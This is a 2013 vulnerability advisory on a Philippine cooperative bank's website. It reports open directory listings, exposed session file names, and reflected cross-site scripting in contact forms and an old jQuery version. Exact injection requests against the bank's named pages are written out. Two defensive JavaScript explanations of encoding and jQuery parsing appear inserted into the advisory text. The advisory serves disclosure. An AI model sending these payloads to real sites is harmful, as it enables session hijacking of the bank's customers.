FICOBank Information Disclosure / Cross Site Scripting

Posted Aug 23, 2013
Authored by Juan Carlos Garcia

FICOBank suffers from exposed directory listing and cross site scripting vulnerabilities. They do not believe any of this is an issue and if you use them, you should change banks immediately.

tags | exploit, vulnerability, xss
SHA-256 | a3b64ae17ac6373785bfcea917ed3efed819ce567e81d61f13690c93de1a211e

FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable


Report-Timeline:
================

23-08-2013 Advisory

Response: "Our country does not have the same laws as their own and we do not consider the data you send us to be security flaws.
Thank you very much"

( /ME I don't understand this response. Is it a joke? )

20-08-2013 Full Disclosure


I-VULNERABILITY
-------------------------

#Title: FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable

#Vendor: http://www.ficobank.com / http://ficobank.com

#Author: Juan Carlos García (@secnight)

#Follow me

http://www.highsec.es
Twitter:@secnight



II-Introduction:
=============

The First Isabela Cooperative Bank (FICOBank) is one of the pioneer and prominent cooperative banks in the Philippines.
Its origin is deeply rooted in the community, as it was organized 36 years ago by two cooperatives and 47 samahang nayons,
which represented farmers who had limited resources and access to banking services. From the molehill-size cooperative rural
bank it opted to be, it has grown into a mountain-high cooperative bank, and can now lay claim to a resource base of over
Php 2.37 billion (as of December 31, 2012).

-------------------------

III-PROOF OF CONCEPT
====================

Attack details
--------------

Directory Listing
*****************

The web server is configured to display the list of files contained in this directory.
This is not recommended, because the directory may contain files that are not normally
exposed through links on the web site. A user can view a list of all files in this
directory, possibly exposing sensitive information.

Affected items

http://ficobank.com/annualreport/

/annualreport
/annualreport/_notes
/annualreport/annualreport
/Assets4Sale
/Assets4Sale/a4sale
/Assets4Sale/a4sale/_notes
/contact
/contact/_notes
/contact/html-contact-form-captcha
/contact/html-contact-form-captcha/_notes
/contact/html-contact-form-captcha/scripts
/contact/html-contact-form-captcha/scripts/_notes
/contact/scripts
/contact/scripts/_notes
/contact/scripts-old
/contact/scripts-old/_notes
/DepositProducts
/DepositProducts/_notes
/Ficonnect
/flash
/flash/_notes
/images
/images/awards
/images/images
/images/jobopening
/images/jobopening/_notes
/images/officer
/images/signature
/images/signature/_notes
/images/slides
/Leadership
/LoanProducts
/news
/news/_notes
/OtherServices
/OtherServices/_notes
/scripts
/scripts/_notes
/Stylesheet
/Stylesheet/_notes

Temporary file/directory

Affected items

http://www.ficobank.com/tmp/

/tmp
/tmp/mailError.log
/tmp/sess_secnightsessionfixation
/tmp/sess_b35e89c88df72a4c589a5a8e1a495594
/tmp/sess_f277f2a2689ac1ee7b04b527b80b9b7c
/tmp/untitled

File Lock

Lock files often contain the username of the user who locked the file, so
usernames can be harvested from them.


http://www.ficobank.com/DepositProducts/

Cross Site Scripting
****************

Cross site scripting (also referred to as XSS) is a vulnerability that allows
an attacker to send malicious code (usually in the form of JavaScript) to another user.
Because a browser cannot know whether the script should be trusted, it executes
the script in the user's context, allowing the attacker to access any cookies or session tokens
retained by the browser.


Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into
a vulnerable application to fool a user in order to gather data from them. An attacker can steal the
session cookie and take over the account, impersonating the user. It is also possible to modify the content
of the page presented to the user.
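The contact-form findings below all share one root cause: a submitted value is written back into a quoted attribute without encoding, so a quote in the value ends the attribute and whatever follows becomes new attributes. The following is an added example, not code from the advisory or from FICOBank's site; it reproduces that behaviour on the advisory's own email payload and shows the attribute encoding that keeps the value inside the quotes.

```javascript
// Added example; not code from the advisory or from FICOBank's site.
// Shows why a value reflected into a quoted attribute needs attribute
// encoding, using the email payload the advisory reports (constructed here).
const PAYLOAD = "sample@email.tst' onmouseover=prompt(947854) bad='";

// Vulnerable rendering: raw concatenation, the behaviour the advisory
// describes ("reflected inside a tag parameter between single quotes").
function renderUnsafe(value) {
  return "<input type='text' name='email' value='" + value + "'>";
}

// Attribute encoding: every character that can end or alter an attribute
// becomes a character reference, so the browser keeps it inside the value.
function encodeAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(value) {
  return "<input type='text' name='email' value='" + encodeAttr(value) + "'>";
}

// Tiny attribute tokenizer for one <tag ...> string: returns the attribute
// names a browser would see. Used only to show whether the reflected value
// added an event-handler attribute (a quick check, not a full HTML parser).
function attributeNames(tag) {
  const inner = tag.replace(/^<\w+\s*/, "").replace(/\s*\/?>$/, "");
  const re = /([^\s=]+)(?:\s*=\s*(?:'[^']*'|"[^"]*"|[^\s'">]+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// attributeNames(renderUnsafe(PAYLOAD)) -> ['type','name','value','onmouseover','bad']
// attributeNames(renderSafe(PAYLOAD))   -> ['type','name','value']
```

The same encoding covers the double-quoted cases reported for email.php and samplexyz.php, since `"` is replaced as well.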


Affected items

/contact/contactus.php

URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(947854) bad='
The input is reflected inside a tag parameter between single quotes.


Variant email(2)

6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28947854%29%20bad%3d%27&message=20&name=secnight&submit=Submit

6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28924627%29%20bad%3d%27&message=20&name=jjxlxmqv&submit=Submit



Variant Name

URL encoded POST input name was set to secnight'and jjxlxmqv' onmouseover=prompt(991722) bad='
The input is reflected inside a tag parameter between single quotes.

POST /contact/contactus.php

6_letters_code=94102&email=sample%40email.tst&message=20&name=secnight%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit
6_letters_code=94102&email=sample%40email.tst&message=20&name=jjxlxmqv%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit


/contact/email.php

URI was set to #" onmouseover=prompt(919235) //
The input is reflected inside a tag parameter between double quotes.

GET /contact/email.php/%F6%22%20onmouseover=prompt(919235)%20//


/contact/email.php.bak

URI was set to #" onmouseover=prompt(994575) //

GET /contact/email.php.bak/%F6%22%20onmouseover=prompt(994575)%20//


/contact/email.php.BAK

URI was set to #" onmouseover=prompt(924567) //

The input is reflected inside a tag parameter between double quotes.


GET /contact/email.php.BAK/%F6%22%20onmouseover=prompt(924567)%20//


/contact/html-contact-form-captcha/html-contact-form.php (4)

URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(913822) bad='

POST /contact/html-contact-form-captcha/html-contact-form.php

6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28913822%29%20bad%3d%27&message=20&name=fpfvlamn&submit=Submit


/contact/samplexyz.php (7)

URL encoded POST input contactname was set to pdnfeddf" onmouseover=prompt(969944) bad="

POST /contact/samplexyz.php

contactname=pdnfeddf%22%20onmouseover%3dprompt%28969944%29%20bad%3d%22&email=sample%40email.tst&subject=1

Variants contactname,email,subject


/contact/samplexyz.php.bak

URI was set to #" onmouseover=prompt(959358) //
The input is reflected inside a tag parameter between double quotes.

GET /contact/samplexyz.php.bak/%F6%22%20onmouseover=prompt(959358)%20//


/contact/samplexyz.php.BAK

URI was set to #" onmouseover=prompt(966989) //

GET /contact/samplexyz.php.BAK/%F6%22%20onmouseover=prompt(966989)%20//


/contactus.php(4)

Variant email, name

email(3)

URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(971885) bad='


6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28971885%29%20bad%3d%27&message=20&name=bxaskxpx&submit=Submit

name(1)

URL encoded POST input name was set to iwelgyng' onmouseover=prompt(991324) bad='

6_letters_code=94102&email=sample%40email.tst&message=20&name=iwelgyng%27%20onmouseover%3dprompt%28991324%29%20bad%3d%27&submit=Submit


Jquery Old Version Vulnerable
***************************

jQuery JavaScript Library v1.4.2

This problem was fixed in jQuery 1.6.3.

The page uses an older version of jQuery that has a cross site scripting vulnerability.
Many sites pass location.hash to jQuery to select an element, and in these versions that
lets someone inject script into the page.

$("#id") is a CSS selector, $("<img>") is createElement, and $("#<img>") is createElement too.
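The reason `$("#<img>")` creates an element in 1.4.2 is the regular expression jQuery's init() used to tell HTML from a selector: any string containing `<...>` counted as HTML, even when it started with `#`. The added example below (not jQuery's source and not the advisory's code) reproduces that check as written in 1.4.2 and in 1.6.3, classifies the advisory's proof-of-concept fragment under each, and adds an application-side guard that does not depend on the jQuery version.

```javascript
// Added example; not jQuery's source nor the advisory's code. It reproduces
// the "quickExpr" test jQuery used in its init() to decide whether a string
// is HTML or a selector, as written in 1.4.2 (the version on the site) and
// in 1.6.3 (the fix), and classifies inputs the way each version would.
const quickExpr142 = /^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/;        // jQuery 1.4.2
const quickExpr163 = /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/;   // jQuery 1.6.3

// "html"     -> the string would be parsed into DOM nodes (script can run)
// "id"       -> document.getElementById
// "selector" -> handed to the CSS selector engine (which rejects '<')
function classify(input, quickExpr) {
  const m = quickExpr.exec(input);
  if (m && m[1]) return "html";
  if (m && m[2] !== undefined) return "id";
  return "selector";
}

// Application-side guard, independent of the jQuery version: only accept a
// hash that is a plain fragment id before using it to select an element.
function isPlainIdHash(hash) {
  return /^#[\w-]+$/.test(hash);
}

// The fragment used in the advisory's proof of concept (constructed here):
const POC_HASH = "#<img src=/ onerror=alert(1)>";
// classify(POC_HASH, quickExpr142) -> "html"     (1.4.2 creates the <img>)
// classify(POC_HASH, quickExpr163) -> "selector" (1.6.3 never treats '#...' as HTML)
```

Note that 1.6.3 only changes how the string is classified; a site that still builds selectors from location.hash should validate the hash itself, as isPlainIdHash does.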


Affected items

/OtherServices/fade.min.js


GET /OtherServices/fade.min.js

Response:

HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml",
CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 13 Dec 2011 07:09:36 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28


/OtherServices/jquery.fade.js


GET /OtherServices/jquery.fade.js
jquery_xss/#<img src=/ onerror=alert(1)>

Response

HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 13 Dec 2011 07:09:52 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28
Content-Length: 72174


/scripts/fade.min.js


GET /scripts/fade.min.js

Response

HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 11 Jul 2013 03:44:10 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28
Content-Length: 72174


/scripts/jquery.fade.js


GET /scripts/jquery.fade.js

Response

The same as above.


IV. CREDITS
-------------------------

This vulnerability has been discovered
by Juan Carlos García(@secnight)

Special Thanks: Perseo


V. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.